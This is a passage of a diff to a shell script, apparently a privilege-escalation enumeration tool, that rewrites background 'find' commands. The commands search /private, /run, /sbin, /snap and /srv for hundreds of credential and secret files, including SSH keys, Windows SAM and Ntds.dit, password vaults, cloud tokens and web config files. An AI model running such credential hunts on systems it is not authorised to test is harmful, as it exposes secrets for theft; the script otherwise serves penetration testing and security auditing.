2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_PRIVATE=`eval_bckgrd "find /private -name \"log4j-core*.jar\" -o -name \"influxdb.conf\" -o -name \"*.kdbx\" -o -name \"SAM\" -o -name \"*.db\" -o -name \"Dockerfile\" -o -name \"accessTokens.json\" -o -name \"*.sqlite\" -o -name \".google_authenticator\" -o -name \"KeePass.ini\" -o -name \"jetty-realm.properties\" -o -name \"authorized_keys\" -o -name \"software\" -o -name \".plan\" -o -name \"elasticsearch.y*ml\" -o -name \"*.cer\" -o -name \"sess_*\" -o -name \"server.xml\" -o -name \"*.gpg\" -o -name \".github\" -o -name \"passwd\" -o -name \"sites.ini\" -o -name \"unattend.inf\" -o -name \"rocketchat.service\" -o -name \"mariadb.cnf\" -o -name \".profile\" -o -name \"iis6.log\" -o -name \".gitconfig\" -o -name \".ldaprc\" -o -name \"zabbix_server.conf\" -o -name \"*.psk\" -o -name \"protecteduserkey.bin\" -o -name \".msmtprc\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"pgsql.conf\" -o -name \".recently-used.xbel\" -o -name \"system.sav\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \".bashrc\" -o -name \"hostapd.conf\" -o -name \"*.swp\" -o -name \".htpasswd\" -o -name \".sudo_as_admin_successful\" -o -name \".pypirc\" -o -name \"redis.conf\" -o -name \"datasources.xml\" -o -name \"ws_ftp.ini\" -o -name \"cesi.conf\" -o -name \"*password*\" -o -name \"pg_hba.conf\" -o -name \"AzureRMContext.json\" -o -name \"known_hosts\" -o -name \"ddclient.conf\" -o -name \"recentservers.xml\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"Ntds.dit\" -o -name \".k5login\" -o -name \"appcmd.exe\" -o -name \"printers.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"config.php\" -o -name \"krb5.conf\" -o -name \"wp-config.php\" -o -name \"ffftp.ini\" -o -name \"ipsec.secrets\" -o -name \"unattend.txt\" -o -name \"credentials\" -o -name \"error.log\" -o -name \"*.crt\" -o -name \".env\" -o -name \"tomcat-users.xml\" -o -name \"*config*.php\" -o -name \"*.csr\" -o -name \"*.keyring\" -o -name \"drives.xml\" -o -name \"winscp.ini\" -o -name \"id_rsa*\" -o -name \"access_tokens.db\" -o -name \"docker-compose.yml\" -o -name \"sentry.conf.py\" -o -name \"scclient.exe\" -o -name \"krb5.keytab\" -o -name \"sssd.conf\" -o -name \"rsyncd.secrets\" -o -name \".git-credentials\" -o -name \"TokenCache.dat\" -o -name \"settings.php\" -o -name \"*vnc*.xml\" -o -name \"psk.txt\" -o -name \"*.pfx\" -o -name \"passbolt.php\" -o -name \"wsl.exe\" -o -name \"php.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"access_tokens.json\" -o -name \"https.conf\" -o -name \"web*.config\" -o -name \"snmpd.conf\" -o -name \"rsyncd.conf\" -o -name \"bash.exe\" -o -name \"ftp.config\" -o -name \"kibana.y*ml\" -o -name \"000-default.conf\" -o -name \"db.php\" -o -name \"legacy_credentials.db\" -o -name \"scheduledtasks.xml\" -o -name \"SYSTEM\" -o -name \"ipsec.conf\" -o -name \"*.socket\" -o -name \"storage.php\" -o -name \"*.pem\" -o -name \"*.viminfo\" -o -name \".wgetrc\" -o -name \".lesshst\" -o -name \"RDCMan.settings\" -o -name \"credentials.db\" -o -name \"default.sav\" -o -name \".vault-token\" -o -name \"AppEvent.Evt\" -o -name \"gitlab.rm\" -o -name \"*.rdg\" -o -name \"gvm-tools.conf\" -o -name \"docker.sock\" -o -name \"*.jks\" -o -name \"wcx_ftp.ini\" -o -name \".secrets.mkey\" -o -name \"fastcgi_params\" -o -name \"id_dsa*\" -o -name \"KeePass.config*\" -o -name \"*.timer\" -o -name \"kcpassword\" -o -name \"index.dat\" -o -name \"mongod*.conf\" -o -name \"gitlab.yml\" -o -name \"postgresql.conf\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.gnupg\" -o -name \"autologin.conf\" -o -name \"setupinfo\" -o -name \"backup\" -o -name \"*.p12\" -o -name \"debian.cnf\" -o -name \"cloud.cfg\" -o -name \"ConsoleHost_history.txt\" -o -name \"setupinfo.bak\" -o -name \"*credential*\" -o -name \"kadm5.acl\" -o -name \"my.cnf\" -o -name \".erlang.cookie\" -o -name \"SecEvent.Evt\" -o -name \"*vnc*.txt\" -o -name \"mosquitto.conf\" -o -name \"*.sqlite3\" -o -name \"*.ftpconfig\" -o -name \"unattended.xml\" -o -name \"*vnc*.ini\" -o -name \"*.der\" -o -name \"secrets.ldb\" -o -name \"docker.socket\" -o -name \"groups.xml\" -o -name \"httpd.conf\" -o -name \"unattend.xml\" -o -name \"racoon.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"*_history*\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \".git\" -o -name \"*.pgp\" -o -name \"autologin\" -o -name \"backups\" -o -name \"filezilla.xml\" -o -name \"authorized_hosts\" -o -name \"NetSetup.log\" -o -name \"software.sav\" -o -name \"creds*\" -o -name \"ntuser.dat\" -o -name \"security.sav\" -o -name \"azureProfile.json\" -o -name \"access.log\" -o -name \".rhosts\" -o -name \"pagefile.sys\" -o -name \"https-xampp.conf\" -o -name \"pgadmin*.db\" -o -name \"agent*\" -o -name \"*.keystore\" -o -name \"sysprep.xml\" -o -name \"*vnc*.c*nf*\" -o -name \"KeePass.enforced*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_RUN=`eval_bckgrd "find /run -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SBIN=`eval_bckgrd "find /sbin -name \"*.pem\" -o -name \"KeePass.config*\" -o -name \"ftp.config\" -o -name \"TokenCache.dat\" -o -name \".k5login\" -o -name \"*.viminfo\" -o -name \"anaconda-ks.cfg\" -o -name \"NetSetup.log\" -o -name \"*vnc*.ini\" -o -name \"*config*.php\" -o -name \"protecteduserkey.bin\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"drives.xml\" -o -name \"sentry.conf.py\" -o -name \"*.db\" -o -name \"sysprep.xml\" -o -name \"SYSTEM\" -o -name \"*.csr\" -o -name \"redis.conf\" -o -name \"jetty-realm.properties\" -o -name \"AppEvent.Evt\" -o -name \"*.keystore\" -o -name \"ftp.ini\" -o -name \"my.ini\" -o -name \"gitlab.rm\" -o -name \"autologin\" -o -name \"Dockerfile\" -o -name \"*.socket\" -o -name \"ipsec.conf\" -o -name \"error.log\" -o -name \"access_tokens.db\" -o -name \"elasticsearch.y*ml\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"kcpassword\" -o -name \"*.keyring\" -o -name \"snmpd.conf\" -o -name \"id_rsa*\" -o -name \"*password*\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \".git\" -o -name \"kibana.y*ml\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \".profile\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.c*nf*\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".erlang.cookie\" -o -name \"postgresql.conf\" -o -name \"*.p12\" -o -name \"unattend.txt\" -o -name \"ipsec.secrets\" -o -name \"config.php\" -o -name \".sudo_as_admin_successful\" -o -name \"*.psk\" -o -name \"zabbix_agentd.conf\" -o -name \"passbolt.php\" -o -name \"RDCMan.settings\" -o -name \".rhosts\" -o -name \".lesshst\" -o -name \"hostapd.conf\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"docker.socket\" -o -name \"cesi.conf\" -o -name \"log4j-core*.jar\" -o -name \"rsyncd.secrets\" -o -name \"groups.xml\" -o -name \"https.conf\" -o -name \"scclient.exe\" -o -name \"krb5.conf\" -o -name \"*.swp\" -o -name \"mongod*.conf\" -o -name \"azureProfile.json\" -o -name \"*.pgp\" -o -name \"unattend.xml\" -o -name \"*.der\" -o -name \"000-default.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"authorized_hosts\" -o -name \".htpasswd\" -o -name \"pgadmin*.db\" -o -name \"*.sqlite3\" -o -name \"php.ini\" -o -name \"index.dat\" -o -name \"access.log\" -o -name \"https-xampp.conf\" -o -name \"AzureRMContext.json\" -o -name \"access_tokens.json\" -o -name \"rsyncd.conf\" -o -name \"*.timer\" -o -name \"mosquitto.conf\" -o -name \".env\" -o -name \"*.key\" -o -name \"my.cnf\" -o -name \"*.rdg\" -o -name \"system.sav\" -o -name \"zabbix_server.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.cer\" -o -name \"passwd\" -o -name \"software\" -o -name \"*.kdbx\" -o -name \"rocketchat.service\" -o -name \"sysprep.inf\" -o -name \"settings.php\" -o -name \"*.gpg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"database.php\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"gvm-tools.conf\" -o -name \"ffftp.ini\" -o -name \"recentservers.xml\" -o -name \"unattended.xml\" -o -name \"backup\" -o -name \"racoon.conf\" -o -name \"sites.ini\" -o -name \"scheduledtasks.xml\" -o -name \".plan\" -o -name \"*.crt\" -o -name \"cloud.cfg\" -o -name \"legacy_credentials.db\" -o -name \"credentials.db\" -o -name \".msmtprc\" -o -name \"kadm5.acl\" -o -name \"storage.php\" -o -name \"setupinfo\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"autologin.conf\" -o -name \".bashrc\" -o -name \".vault-token\" -o -name \"*.ftpconfig\" -o -name \"id_dsa*\" -o -name \"bash.exe\" -o -name \"security.sav\" -o -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"creds*\" -o -name \"iis6.log\" -o -name \".ldaprc\" -o -name \"server.xml\" -o -name \"wsl.exe\" -o -name \"pagefile.sys\" -o -name \"backups\" -o -name \"*.jks\" -o -name \"mariadb.cnf\" -o -name \".pypirc\" -o -name \"SAM\" -o -name \"appcmd.exe\" -o -name \"unattend.inf\" -o -name \"*.gnupg\" -o -name \"ws_ftp.ini\" -o -name \"sssd.conf\" -o -name \"*.pfx\" -o -name \"db.php\" -o -name \"*_history*\" -o -name \"ntuser.dat\" -o -name \"ConsoleHost_history.txt\" -o -name \"gitlab.yml\" -o -name \"filezilla.xml\" -o -name \"winscp.ini\" -o -name \"krb5.keytab\" -o -name \"pgsql.conf\" -o -name \"httpd.conf\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"software.sav\" -o -name \"wp-config.php\" -o -name \"credentials\" -o -name \"vault-ssh-helper.hcl\" -o -name \"tomcat-users.xml\" -o -name \".github\" -o -name \".wgetrc\" -o -name \"*vnc*.xml\" -o -name \"*credential*\" -o -name \".recently-used.xbel\" -o -name \"accessTokens.json\" -o -name \"psk.txt\" -o -name \".git-credentials\" -o -name \".secrets.mkey\" -o -name \"secrets.ldb\" -o -name \"debian.cnf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SNAP=`eval_bckgrd "find /snap -name \"*.pem\" -o -name \"KeePass.config*\" -o -name \"ftp.config\" -o -name \"TokenCache.dat\" -o -name \".k5login\" -o -name \"*.viminfo\" -o -name \"anaconda-ks.cfg\" -o -name \"NetSetup.log\" -o -name \"*vnc*.ini\" -o -name \"*config*.php\" -o -name \"protecteduserkey.bin\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"drives.xml\" -o -name \"sentry.conf.py\" -o -name \"*.db\" -o -name \"sysprep.xml\" -o -name \"SYSTEM\" -o -name \"*.csr\" -o -name \"redis.conf\" -o -name \"jetty-realm.properties\" -o -name \"AppEvent.Evt\" -o -name \"*.keystore\" -o -name \"ftp.ini\" -o -name \"my.ini\" -o -name \"gitlab.rm\" -o -name \"autologin\" -o -name \"Dockerfile\" -o -name \"*.socket\" -o -name \"ipsec.conf\" -o -name \"error.log\" -o -name \"access_tokens.db\" -o -name \"elasticsearch.y*ml\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"kcpassword\" -o -name \"*.keyring\" -o -name \"snmpd.conf\" -o -name \"id_rsa*\" -o -name \"*password*\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \".git\" -o -name \"kibana.y*ml\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \".profile\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.c*nf*\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".erlang.cookie\" -o -name \"postgresql.conf\" -o -name \"*.p12\" -o -name \"unattend.txt\" -o -name \"ipsec.secrets\" -o -name \"config.php\" -o -name \".sudo_as_admin_successful\" -o -name \"*.psk\" -o -name \"zabbix_agentd.conf\" -o -name \"passbolt.php\" -o -name \"RDCMan.settings\" -o -name \".rhosts\" -o -name \".lesshst\" -o -name \"hostapd.conf\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"docker.socket\" -o -name \"cesi.conf\" -o -name \"log4j-core*.jar\" -o -name \"rsyncd.secrets\" -o -name \"groups.xml\" -o -name \"https.conf\" -o -name \"scclient.exe\" -o -name \"krb5.conf\" -o -name \"*.swp\" -o -name \"mongod*.conf\" -o -name \"azureProfile.json\" -o -name \"*.pgp\" -o -name \"unattend.xml\" -o -name \"*.der\" -o -name \"000-default.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"authorized_hosts\" -o -name \".htpasswd\" -o -name \"pgadmin*.db\" -o -name \"*.sqlite3\" -o -name \"php.ini\" -o -name \"index.dat\" -o -name \"access.log\" -o -name \"https-xampp.conf\" -o -name \"AzureRMContext.json\" -o -name \"access_tokens.json\" -o -name \"rsyncd.conf\" -o -name \"*.timer\" -o -name \"mosquitto.conf\" -o -name \".env\" -o -name \"*.key\" -o -name \"my.cnf\" -o -name \"*.rdg\" -o -name \"system.sav\" -o -name \"zabbix_server.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.cer\" -o -name \"passwd\" -o -name \"software\" -o -name \"*.kdbx\" -o -name \"rocketchat.service\" -o -name \"sysprep.inf\" -o -name \"settings.php\" -o -name \"*.gpg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"database.php\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"gvm-tools.conf\" -o -name \"ffftp.ini\" -o -name \"recentservers.xml\" -o -name \"unattended.xml\" -o -name \"backup\" -o -name \"racoon.conf\" -o -name \"sites.ini\" -o -name \"scheduledtasks.xml\" -o -name \".plan\" -o -name \"*.crt\" -o -name \"cloud.cfg\" -o -name \"legacy_credentials.db\" -o -name \"credentials.db\" -o -name \".msmtprc\" -o -name \"kadm5.acl\" -o -name \"storage.php\" -o -name \"setupinfo\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"autologin.conf\" -o -name \".bashrc\" -o -name \".vault-token\" -o -name \"*.ftpconfig\" -o -name \"id_dsa*\" -o -name \"bash.exe\" -o -name \"security.sav\" -o -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"creds*\" -o -name \"iis6.log\" -o -name \".ldaprc\" -o -name \"server.xml\" -o -name \"wsl.exe\" -o -name \"pagefile.sys\" -o -name \"backups\" -o -name \"*.jks\" -o -name \"mariadb.cnf\" -o -name \".pypirc\" -o -name \"SAM\" -o -name \"appcmd.exe\" -o -name \"unattend.inf\" -o -name \"*.gnupg\" -o -name \"ws_ftp.ini\" -o -name \"sssd.conf\" -o -name \"*.pfx\" -o -name \"db.php\" -o -name \"*_history*\" -o -name \"ntuser.dat\" -o -name \"ConsoleHost_history.txt\" -o -name \"gitlab.yml\" -o -name \"filezilla.xml\" -o -name \"winscp.ini\" -o -name \"krb5.keytab\" -o -name \"pgsql.conf\" -o -name \"httpd.conf\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"software.sav\" -o -name \"wp-config.php\" -o -name \"credentials\" -o -name \"vault-ssh-helper.hcl\" -o -name \"tomcat-users.xml\" -o -name \".github\" -o -name \".wgetrc\" -o -name \"*vnc*.xml\" -o -name \"*credential*\" -o -name \".recently-used.xbel\" -o -name \"accessTokens.json\" -o -name \"psk.txt\" -o -name \".git-credentials\" -o -name \".secrets.mkey\" -o -name \"secrets.ldb\" -o -name \"debian.cnf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SRV=`eval_bckgrd "find /srv -name \"*.pem\" -o -name \"KeePass.config*\" -o -name \"ftp.config\" -o -name \"TokenCache.dat\" -o -name \".k5login\" -o -name \"*.viminfo\" -o -name \"anaconda-ks.cfg\" -o -name \"NetSetup.log\" -o -name \"*vnc*.ini\" -o -name \"*config*.php\" -o -name \"protecteduserkey.bin\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"drives.xml\" -o -name \"sentry.conf.py\" -o -name \"*.db\" -o -name \"sysprep.xml\" -o -name \"SYSTEM\" -o -name \"*.csr\" -o -name \"redis.conf\" -o -name \"jetty-realm.properties\" -o -name \"AppEvent.Evt\" -o -name \"*.keystore\" -o -name \"ftp.ini\" -o -name \"my.ini\" -o -name \"gitlab.rm\" -o -name \"autologin\" -o -name \"Dockerfile\" -o -name \"*.socket\" -o -name \"ipsec.conf\" -o -name \"error.log\" -o -name \"access_tokens.db\" -o -name \"elasticsearch.y*ml\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"kcpassword\" -o -name \"*.keyring\" -o -name \"snmpd.conf\" -o -name \"id_rsa*\" -o -name \"*password*\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \".git\" -o -name \"kibana.y*ml\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \".profile\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.c*nf*\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".erlang.cookie\" -o -name \"postgresql.conf\" -o -name \"*.p12\" -o -name \"unattend.txt\" -o -name \"ipsec.secrets\" -o -name \"config.php\" -o -name \".sudo_as_admin_successful\" -o -name \"*.psk\" -o -name \"zabbix_agentd.conf\" -o -name \"passbolt.php\" -o -name \"RDCMan.settings\" -o -name \".rhosts\" -o -name \".lesshst\" -o -name \"hostapd.conf\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"docker.socket\" -o -name \"cesi.conf\" -o -name \"log4j-core*.jar\" -o -name \"rsyncd.secrets\" -o -name \"groups.xml\" -o -name \"https.conf\" -o -name \"scclient.exe\" -o -name \"krb5.conf\" -o -name \"*.swp\" -o -name \"mongod*.conf\" -o -name \"azureProfile.json\" -o -name \"*.pgp\" -o -name \"unattend.xml\" -o -name \"*.der\" -o -name \"000-default.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"authorized_hosts\" -o -name \".htpasswd\" -o -name \"pgadmin*.db\" -o -name \"*.sqlite3\" -o -name \"php.ini\" -o -name \"index.dat\" -o -name \"access.log\" -o -name \"https-xampp.conf\" -o -name \"AzureRMContext.json\" -o -name \"access_tokens.json\" -o -name \"rsyncd.conf\" -o -name \"*.timer\" -o -name \"mosquitto.conf\" -o -name \".env\" -o -name \"*.key\" -o -name \"my.cnf\" -o -name \"*.rdg\" -o -name \"system.sav\" -o -name \"zabbix_server.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.cer\" -o -name \"passwd\" -o -name \"software\" -o -name \"*.kdbx\" -o -name \"rocketchat.service\" -o -name \"sysprep.inf\" -o -name \"settings.php\" -o -name \"*.gpg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"database.php\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"gvm-tools.conf\" -o -name \"ffftp.ini\" -o -name \"recentservers.xml\" -o -name \"unattended.xml\" -o -name \"backup\" -o -name \"racoon.conf\" -o -name \"sites.ini\" -o -name \"scheduledtasks.xml\" -o -name \".plan\" -o -name \"*.crt\" -o -name \"cloud.cfg\" -o -name \"legacy_credentials.db\" -o -name \"credentials.db\" -o -name \".msmtprc\" -o -name \"kadm5.acl\" -o -name \"storage.php\" -o -name \"setupinfo\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"autologin.conf\" -o -name \".bashrc\" -o -name \".vault-token\" -o -name \"*.ftpconfig\" -o -name \"id_dsa*\" -o -name \"bash.exe\" -o -name \"security.sav\" -o -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"creds*\" -o -name \"iis6.log\" -o -name \".ldaprc\" -o -name \"server.xml\" -o -name \"wsl.exe\" -o -name \"pagefile.sys\" -o -name \"backups\" -o -name \"*.jks\" -o -name \"mariadb.cnf\" -o -name \".pypirc\" -o -name \"SAM\" -o -name \"appcmd.exe\" -o -name \"unattend.inf\" -o -name \"*.gnupg\" -o -name \"ws_ftp.ini\" -o -name \"sssd.conf\" -o -name \"*.pfx\" -o -name \"db.php\" -o -name \"*_history*\" -o -name \"ntuser.dat\" -o -name \"ConsoleHost_history.txt\" -o -name \"gitlab.yml\" -o -name \"filezilla.xml\" -o -name \"winscp.ini\" -o -name \"krb5.keytab\" -o -name \"pgsql.conf\" -o -name \"httpd.conf\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"software.sav\" -o -name \"wp-config.php\" -o -name \"credentials\" -o -name \"vault-ssh-helper.hcl\" -o -name \"tomcat-users.xml\" -o -name \".github\" -o -name \".wgetrc\" -o -name \"*vnc*.xml\" -o -name \"*credential*\" -o -name \".recently-used.xbel\" -o -name \"accessTokens.json\" -o -name \"psk.txt\" -o -name \".git-credentials\" -o -name \".secrets.mkey\" -o -name \"secrets.ldb\" -o -name \"debian.cnf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SBIN=`eval_bckgrd "find /sbin -name \"log4j-core*.jar\" -o -name \"influxdb.conf\" -o -name \"*.kdbx\" -o -name \"SAM\" -o -name \"*.db\" -o -name \"Dockerfile\" -o -name \"accessTokens.json\" -o -name \"*.sqlite\" -o -name \".google_authenticator\" -o -name \"KeePass.ini\" -o -name \"jetty-realm.properties\" -o -name \"authorized_keys\" -o -name \"software\" -o -name \".plan\" -o -name \"elasticsearch.y*ml\" -o -name \"*.cer\" -o -name \"server.xml\" -o -name \"*.gpg\" -o -name \".github\" -o -name \"passwd\" -o -name \"sites.ini\" -o -name \"unattend.inf\" -o -name \"rocketchat.service\" -o -name \"mariadb.cnf\" -o -name \".profile\" -o -name \"iis6.log\" -o -name \".gitconfig\" -o -name \".ldaprc\" -o -name \"zabbix_server.conf\" -o -name \"*.psk\" -o -name \"protecteduserkey.bin\" -o -name \".msmtprc\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"pgsql.conf\" -o -name \".recently-used.xbel\" -o -name \"system.sav\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \".bashrc\" -o -name \"hostapd.conf\" -o -name \"*.swp\" -o -name \".htpasswd\" -o -name \".sudo_as_admin_successful\" -o -name \".pypirc\" -o -name \"redis.conf\" -o -name \"datasources.xml\" -o -name \"ws_ftp.ini\" -o -name \"cesi.conf\" -o -name \"*password*\" -o -name \"pg_hba.conf\" -o -name \"AzureRMContext.json\" -o -name \"known_hosts\" -o -name \"ddclient.conf\" -o -name \"recentservers.xml\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"Ntds.dit\" -o -name \".k5login\" -o -name \"appcmd.exe\" -o -name \"printers.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"config.php\" -o -name \"krb5.conf\" -o -name \"wp-config.php\" -o -name \"ffftp.ini\" -o -name \"ipsec.secrets\" -o -name \"unattend.txt\" -o -name \"credentials\" -o -name \"error.log\" -o -name \"*.crt\" -o -name \".env\" -o -name \"tomcat-users.xml\" -o -name \"*config*.php\" -o -name \"*.csr\" -o -name \"*.keyring\" -o -name \"drives.xml\" -o -name \"winscp.ini\" -o -name \"id_rsa*\" -o -name \"access_tokens.db\" -o -name \"docker-compose.yml\" -o -name \"sentry.conf.py\" -o -name \"scclient.exe\" -o -name \"krb5.keytab\" -o -name \"sssd.conf\" -o -name \"rsyncd.secrets\" -o -name \".git-credentials\" -o -name \"TokenCache.dat\" -o -name \"settings.php\" -o -name \"*vnc*.xml\" -o -name \"psk.txt\" -o -name \"*.pfx\" -o -name \"passbolt.php\" -o -name \"wsl.exe\" -o -name \"php.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"access_tokens.json\" -o -name \"https.conf\" -o -name \"web*.config\" -o -name \"snmpd.conf\" -o -name \"rsyncd.conf\" -o -name \"bash.exe\" -o -name \"ftp.config\" -o -name \"kibana.y*ml\" -o -name \"000-default.conf\" -o -name \"db.php\" -o -name \"legacy_credentials.db\" -o -name \"scheduledtasks.xml\" -o -name \"SYSTEM\" -o -name \"ipsec.conf\" -o -name \"*.socket\" -o -name \"storage.php\" -o -name \"*.pem\" -o -name \"*.viminfo\" -o -name \".wgetrc\" -o -name \".lesshst\" -o -name \"RDCMan.settings\" -o -name \"credentials.db\" -o -name \"default.sav\" -o -name \".vault-token\" -o -name \"AppEvent.Evt\" -o -name \"gitlab.rm\" -o -name \"*.rdg\" -o -name \"gvm-tools.conf\" -o -name \"docker.sock\" -o -name \"*.jks\" -o -name \"wcx_ftp.ini\" -o -name \".secrets.mkey\" -o -name \"fastcgi_params\" -o -name \"id_dsa*\" -o -name \"KeePass.config*\" -o -name \"*.timer\" -o -name \"kcpassword\" -o -name \"index.dat\" -o -name \"mongod*.conf\" -o -name \"gitlab.yml\" -o -name \"postgresql.conf\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.gnupg\" -o -name \"autologin.conf\" -o -name \"setupinfo\" -o -name \"backup\" -o -name \"*.p12\" -o -name \"debian.cnf\" -o -name \"cloud.cfg\" -o -name \"ConsoleHost_history.txt\" -o -name \"setupinfo.bak\" -o -name \"*credential*\" -o -name \"kadm5.acl\" -o -name \"my.cnf\" -o -name \".erlang.cookie\" -o -name \"SecEvent.Evt\" -o -name \"*vnc*.txt\" -o -name \"mosquitto.conf\" -o -name \"*.sqlite3\" -o -name \"*.ftpconfig\" -o -name \"unattended.xml\" -o -name \"*vnc*.ini\" -o -name \"*.der\" -o -name \"secrets.ldb\" -o -name \"docker.socket\" -o -name \"groups.xml\" -o -name \"httpd.conf\" -o -name \"unattend.xml\" -o -name \"racoon.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"*_history*\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \".git\" -o -name \"*.pgp\" -o -name \"autologin\" -o -name \"backups\" -o -name \"filezilla.xml\" -o -name \"authorized_hosts\" -o -name \"NetSetup.log\" -o -name \"software.sav\" -o -name \"creds*\" -o -name \"ntuser.dat\" -o -name \"security.sav\" -o -name \"azureProfile.json\" -o -name \"access.log\" -o -name \".rhosts\" -o -name \"pagefile.sys\" -o -name \"https-xampp.conf\" -o -name \"pgadmin*.db\" -o -name \"*.keystore\" -o -name \"sysprep.xml\" -o -name \"*vnc*.c*nf*\" -o -name \"KeePass.enforced*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SNAP=`eval_bckgrd "find /snap -name \"log4j-core*.jar\" -o -name \"influxdb.conf\" -o -name \"*.kdbx\" -o -name \"SAM\" -o -name \"*.db\" -o -name \"Dockerfile\" -o -name \"accessTokens.json\" -o -name \"*.sqlite\" -o -name \".google_authenticator\" -o -name \"KeePass.ini\" -o -name \"jetty-realm.properties\" -o -name \"authorized_keys\" -o -name \"software\" -o -name \".plan\" -o -name \"elasticsearch.y*ml\" -o -name \"*.cer\" -o -name \"server.xml\" -o -name \"*.gpg\" -o -name \".github\" -o -name \"passwd\" -o -name \"sites.ini\" -o -name \"unattend.inf\" -o -name \"rocketchat.service\" -o -name \"mariadb.cnf\" -o -name \".profile\" -o -name \"iis6.log\" -o -name \".gitconfig\" -o -name \".ldaprc\" -o -name \"zabbix_server.conf\" -o -name \"*.psk\" -o -name \"protecteduserkey.bin\" -o -name \".msmtprc\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"pgsql.conf\" -o -name \".recently-used.xbel\" -o -name \"system.sav\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \".bashrc\" -o -name \"hostapd.conf\" -o -name \"*.swp\" -o -name \".htpasswd\" -o -name \".sudo_as_admin_successful\" -o -name \".pypirc\" -o -name \"redis.conf\" -o -name \"datasources.xml\" -o -name \"ws_ftp.ini\" -o -name \"cesi.conf\" -o -name \"*password*\" -o -name \"pg_hba.conf\" -o -name \"AzureRMContext.json\" -o -name \"known_hosts\" -o -name \"ddclient.conf\" -o -name \"recentservers.xml\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"Ntds.dit\" -o -name \".k5login\" -o -name \"appcmd.exe\" -o -name \"printers.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"config.php\" -o -name \"krb5.conf\" -o -name \"wp-config.php\" -o -name \"ffftp.ini\" -o -name \"ipsec.secrets\" -o -name \"unattend.txt\" -o -name \"credentials\" -o -name \"error.log\" -o -name 